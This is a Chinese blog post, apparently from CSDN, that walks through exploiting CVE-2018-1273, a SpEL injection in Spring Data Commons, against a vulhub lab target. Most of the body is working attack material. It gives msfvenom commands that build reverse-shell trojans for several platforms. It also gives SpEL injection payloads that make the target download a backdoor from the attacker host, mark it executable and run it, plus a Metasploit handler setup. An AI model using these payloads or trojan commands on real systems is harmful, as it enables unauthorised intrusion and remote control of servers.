spring(CVE-2018-1273)远程代码执行漏洞复现

已于 2024-05-20 11:13:05 修改
阅读量1.1w 收藏 15
点赞数 66
文章标签: spring 安全 web安全 服务器 linux 运维
于 2024-03-12 10:31:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/typ1234567/article/details/136641704
版权

漏洞说明

Spring Data 是Spring框架中提供底层数据访问的项目模块,Spring Data Commons 是一个共用的基础模块。此模块对特殊属性处理时会使用SpEl表达式,导致攻击者可以通过构造特殊的URL请求,造成服务端远程代码执行。在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式以执行任意命令。Spring在补丁中使用更加安全的SimpleEvaluationContext替换了StandardEvaluationContext。

漏洞影响范围

  • Spring Data Commons 1.13至1.13.10(Ingalls SR10)
  • Spring Data REST 2.6至2.6.10(Ingalls SR10)
  • Spring Data Commons 2.0至2.0.5(Kay SR5)
  • Spring Data REST 3.0至3.0.5(Kay SR5)

以上就是CVE-2018-1273的说明,接下来就来准备我们的漏洞复现的实验环境

使用的靶场是vulhub如果没有安装,请看下面的链接进行安装靶场

在docker容器中安装vulhub靶场环境

攻击机:kali -- 192.168.159.134

目标机:ubuntu -- 192.168.159.137

漏洞复现

1.开启我们的靶机环境

  • docker-compose build
  • docker-compose up -d

一个简单的用户注册功能

2.使用kali配置后门木马

生成windows系统文件格式为EXE的木马
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp lhost=192.168.1.20 lport=9999 -e x86/shikata_ga_nai -i 3 -b '\x00\x0a\xff' -f exe -o payload.exe

生成windows系统文件格式为DLL的木马
msfvenom -p windows/meterpreter/reverse_tcp -b'\x0\x0b' lhost=192.168.1.20 lport=9999 -f dll > payload.dll

生成32位Linux系统文件格式为EIF的木马
msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp -b'\x00\x0b' lhost=192.168.1.20 lport=9999 -f elf -o payload.elf

生成64位Linux系统文件格式为EIF的木马
msfvenom -a x64 --platform Linux -p linux/x64/meterpreter/reverse_tcp -b'\x00\x0b' lhost=192.168.1.20 lport=9999 -f elf -o payload.elf

生成Linux系统文件格式为SO的木马
msfvenom -a x64 --platform Linux -p linux/x64/meterpreter/reverse_tcp -b'\x00\x0b' lhost=192.168.1.20 lport=9999 -f elf-so -o payload.so

生成32位MAX系统文件格式为MACHO的木马
msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp -b '\x00\0b' lhost=192.168.1.20 lport=9999 -f macho -o payload.macho

生成64位MAX系统文件格式为MACHO的木马
msfvenom -a x64 --platform osx -p osx/x64/shell_reverse_tcp -b '\x00\0b' lhost=192.168.1.20 lport=9999 -f macho -o payload.macho

生成Android系统文件格式为APK的木马
msfvenom --platform android -p android/meterpreter/reverse_tcp lhost=192.168.1.20 lport=9999 -o payload.apk

生成IOS系统文件格式为APK的木马
msfvenom --platform apple_ios -p apple_ios/aarch64/meterpreter_reverse_tcp lhost=192.168.1.20 lport=9999 -o payload.ios

因为目标机是ubuntu系统,所以我们的需要配置的是linux的后门

这里的lhost改成我们攻击机的IP地址 iport改成我们监听的端口号
msfvenom -a x64 --platform Linux -p linux/x64/meterpreter/reverse_tcp -b'\x00\x0b' lhost=192.168.159.134 lport=4444 -f elf -o payload.elf

可以看到在目录上生成了一个payload.elf的文件这就是我们的木马后门需要上传到靶机上去

3.开启http服务将kali中的8000端口映射出去

python3 -m http.server 8000

现在我们的准备工作都准备好了现在来进行CVE-2018-1273远程代码执行漏洞的复现

漏洞的代码注入格式

username[#this.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec('执行的命令')")]=asdf

4.使用burpsuite进行请求包的拦截进行重发包

wget 192.168.159.134:8000/payload.elf命令为对kali机中的后门进行下载

username[#this.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec('wget 192.168.159.134:8000/payload.elf')")]=asdf

  • 命令执行成功了看到了目标机已经下载了攻击机中的后门文件

5.对后门文件进行加权限

username[#this.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec('chmod 777 payload.elf')")]=asdf

 6.打开msfconsole进行4444端口监听

use exploit/multi/handler

# 因为目标机是linux所以要用linux的payload
set payload linux/x64/meterpreter/reverse_tcp

# 设置我们攻击机的ip地址
set LHOST  192.168.159.134

# 设置木马设置的反弹端口
set LPORT 4444

7.在目标机中运行后门文件

username[#this.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec('./payload.elf')")]=asdf

然后可以看到目标机的已经连接到我们的攻击机上了,这个漏洞就复现完成了 

有CVE-2018-1273远程代码执行的漏洞尽量赶快跟新版本以免造成不可以避免的损失

辛苦的码农
关注
  • 66
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
linux漏洞分析,Spring-data-commons(CVE-2018-1273)漏洞分析
weixin_39830303的博客
05-13 839
前言CVE-2018-1273Spring-data-commons近期爆出的一个可远程执行代码漏洞,为了了解更多细节,本文将从漏洞的成因,漏洞的判定以及漏洞的利用三个方面来进行详细说明。漏洞的成因当用户在项目中利用了Spring-data的相关web特性对用户的输入参数进行自动匹配的时候,会将用户提交的form表单的key值作为Spel的执行内容,而这一步就是本次漏洞的爆发点。漏洞的判定...
漏洞复现 | CVE-2018-1273 Spring Data Commons 远程命令执行
weixin_42282189的博客
09-15 1811
作者: 墨阳 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x00 前言 Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data Commons是Spring Data下所有子项目共享的基础框架。Spring Data Commons 在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式以执行任意命令。 受影响版本: Spring Data Commons 1.13 – 1.13.10 (Inga.
spring:CVE-2018:1273
最新发布
weixin_69670995的博客
05-18 424
使用浏览器访问users,并输入随便东西。在kali上使用vim新建测试txt文件。使用dirsearch工具进行目录扫描。使用python3开启临时http。修改payload,让靶机执行木马。修改payload,提升木马权限。发到重发器,并修改post传参。返回200,上传txt文件成功。修改paylaod,上传木马。执行成功,返回靶机shell。使用burp抓包,点击注册。返回200,上传成功。
cve-2018-1273 Spring Expression Language 漏洞分析
whatday的专栏
07-31 1027
目录 0x00 背景 x01 漏洞影响 受影响的范围 0x02 SpEL 类类型表达式 类实例化 变量和函数的使用 0x03 SpEL调试 0x04 实战分析 CVE-2018-1273 攻击Exploit的诞生 0x00 背景 最近Spring框架不大太平,接连爆出来多个RCE远程代码执行CVE漏洞,其中有CVE-2018-1270,CVE-2018-1273,通过对造成漏洞部分代码进行分析,发现都是因为滥用SpEL的StandardEvaluationContext。 x0
Spring Data Commons远程命令执行漏洞_CVE-2018-1273(反序列Runtime方法)
weixin_42786460的博客
09-16 375
Spring Data Commons远程命令执行漏洞_CVE-2018-1273(反序列Runtime方法)
CVE-2018-1273漏洞复现日志+IDS规则编写
weixin_41174502的博客
07-25 1615
CVE-2018-1273(Spring Data Commons) 远程命令执行漏洞 漏洞描述: Spring Data Commons(1.13至1.13.10之前的版本,2.0至2.0.5的版本以及较旧的不受支持的版本)包含由于特殊元素的不正确中和而导致的属性绑定器漏洞。未经身份验证的远程恶意用户(或攻击者)可以针对Spring Data REST支持的HTTP资源提供特制的请求参数,或者使用Spring Data的基于投影的请求有效负载绑定可能导致远程执行代码攻击。总结来说这是一个spel表
spring 代码执行CVE-2018-1273
YouthBelief的博客
11-11 1731
spring 代码执行 CVE-2018-1273spring 代码执行CVE-2018-1273)0x01 漏洞描述0x02 影响范围0x03 漏洞复现wget反弹shell0x04 漏洞修复 spring 代码执行CVE-2018-1273) 0x01 漏洞描述 Spring Expression Language是一个功能强大的表达式 语言支持查询和在运行时操作一个对象图。 攻击者可以在未获得授权的情况下,将精心制作的请求参数注入到存在该漏洞服务器上,从而发起远程代码执行攻击。 0x02 影
漏洞复现CVE-2018-1273 Spring Data Commons 远程命令执行
白帽子九一
04-27 995
漏洞背景 Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data Commons是Spring Data下所有子项目共享的基础框架。Spring Data Commons 在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式以执行任意命令。 实验环境 攻击机:Win 10 靶场:kali中搭建vulhub靶场 https://github.com/vulhub/vulhub/spring/CVE-2018-1273 影响版本 Sp
CVE-2023-40477 WinRAR 远程代码执行漏洞 PoC
09-02
WinRAR 拥有超过 500 亿用户,面临新漏洞CVE-2023-40477、CVE-2023-38831)。 今天,我们首次展示:CVE-2023-40477 的 PoC。 尽管 RCE 被认为是可利用的,但由于多种原因,其在实现过程中看起来并不乐观。 我们在...
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
本篇将详细讨论如何修补OpenSSH中的几个已知漏洞,包括CVE-2020-15778、CVE-2018-15473、CVE-2018-15919。 首先,让我们了解这些特定的漏洞: 1. CVE-2020-15778:这是一个与OpenSSH密钥协商过程相关的漏洞,可能...
CVE-2018-1273漏洞复现
qq_56426046的博客
09-11 976
搭建好vulhub环境,选择 CVE-2018-1273漏洞通过"docker-compose build"和"docker-compose up -d"拉取环境,之后访问服务器ip:8080/users看环境是否成功。
[春秋云镜]CVE-2018-1273
niubi707的博客
12-02 5333
[春秋云镜]CVE-2018-1273Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data Commons是Spring Data下所有子项目共享的基础框架。Spring Data Commons 在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式以执行任意命令。
001--什么是SpringData
weixin_42288943的博客
04-17 167
1.参考网址:https://blog.csdn.net/zgf19930504/article/details/50537198 2.核心内容: ** Spring Data **是Spring 的一个子项目, 旨在统一和简化对各类型持久化存储, 而不拘泥于是关系型数据库还是NoSQL 数据存储。无论是哪种持久化存储, 数据访问对象(或称作为DAO,...
spring 代码执行CVE-2018-1273复现
weixin_63124284的博客
10-29 1034
Spring Expression Language是一个功能强大的表达式 语言支持查询和在运行时操作一个对象图。 攻击者可以在未获得授权的情况下,将精心制作的请求参数注入到存在该漏洞服务器上,从而发起远程代码执行攻击。 ​
Spring Data Commons 远程命令执行漏洞CVE-2018-1273
黑白的博客
12-20 2569
声明 好好学习,天天向上 漏洞描述 Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data Commons是Spring Data下所有子项目共享的基础框架。Spring Data Commons 在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式以执行任意命令。 影响范围 · Spring Data Commons 1.13 - 1.13.10 (Ingalls SR10) · Spring Data REST 2.6 - 2
Spring框架漏洞解析之二(CVE-2022-22965、CVE-2022-22947、CVE-2018-1273CVE-2018-1270)
Continuejww的博客
10-20 535
CVE-2022-22965是在Java 9的环境下,引入了class.module.classLoader,导致了CVE-2010-1622漏洞补丁的绕过,JDK9中存在可以绕过黑名单禁用的类,导致了这个漏洞Spring Cloud Gateway 提供了一个库,用于在 Spring WebFlux 之上构建 API 网关。
cve-2022-22947漏洞原理
07-29
根据引用\[1\]和引用\[2\]的信息,CVE-2022-22947漏洞Spring Cloud Gateway中的一处命令注入漏洞。攻击者可以通过利用此漏洞执行SpEL表达式,从而在目标服务器执行任意恶意代码,获取系统权限。具体来说,当使用Spring Cloud Gateway的应用程序对外暴露了Gateway Actuator接口时,攻击者可以发送恶意请求,利用漏洞进行代码注入攻击,从而在远程主机上执行任意远程代码。这个漏洞的影响范围包括Spring Cloud Gateway 3.1.x < 3.1.1和Spring Cloud Gateway 3.0.x < 3.0.7版本,以及其他旧的、不受支持的Spring Cloud Gateway版本。\[1\]\[2\] #### 引用[.reference_title] - *1* *2* [Spring Cloud Gateway RCE漏洞原理分析与复现CVE-2022-22947)](https://blog.csdn.net/qq_49619863/article/details/127350543)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [CVE-2022-22947 Spring Cloud Gateway 远程代码执行漏洞复现](https://blog.csdn.net/weixin_45260839/article/details/124650584)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值